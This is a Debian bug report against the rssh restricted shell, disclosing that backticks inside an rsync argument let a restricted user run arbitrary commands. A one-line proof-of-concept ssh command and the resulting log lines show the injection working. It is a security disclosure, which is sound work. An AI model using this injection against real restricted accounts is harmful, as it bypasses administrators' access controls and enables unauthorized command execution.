Package: rssh
Version: 2.3.2-2
Severity: grave
Tags: security
Justification: user security hole

rssh allows remote command execution using shell backticks:

$ ssh [EMAIL PROTECTED] rsync "`cat /etc/issue`"

will run 'cat /etc/issue' on the remote host:

Mar 10 15:29:55 ijon rssh[11414]: setting log facility to LOG_USER
Mar 10 15:29:55 ijon rssh[11414]: setting umask to 022
Mar 10 15:29:55 ijon rssh[11414]: user liske attempted to execute forbidden 
commands
Mar 10 15:29:55 ijon rssh[11414]: command: rsync Debian GNU/Linux 4.0 \n \l


Cheers,
Thomas Liske

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-686
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)

Versions of packages rssh depends on:
ii  debconf [debconf-2.0]  1.5.11etch1       Debian configuration management sy
ii  libc6                  2.3.6.ds1-13etch5 GNU C Library: Shared libraries
ii  openssh-server         1:4.3p2-9         Secure shell server, an rshd repla

rssh recommends no packages.

-- debconf information excluded



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Reply via email to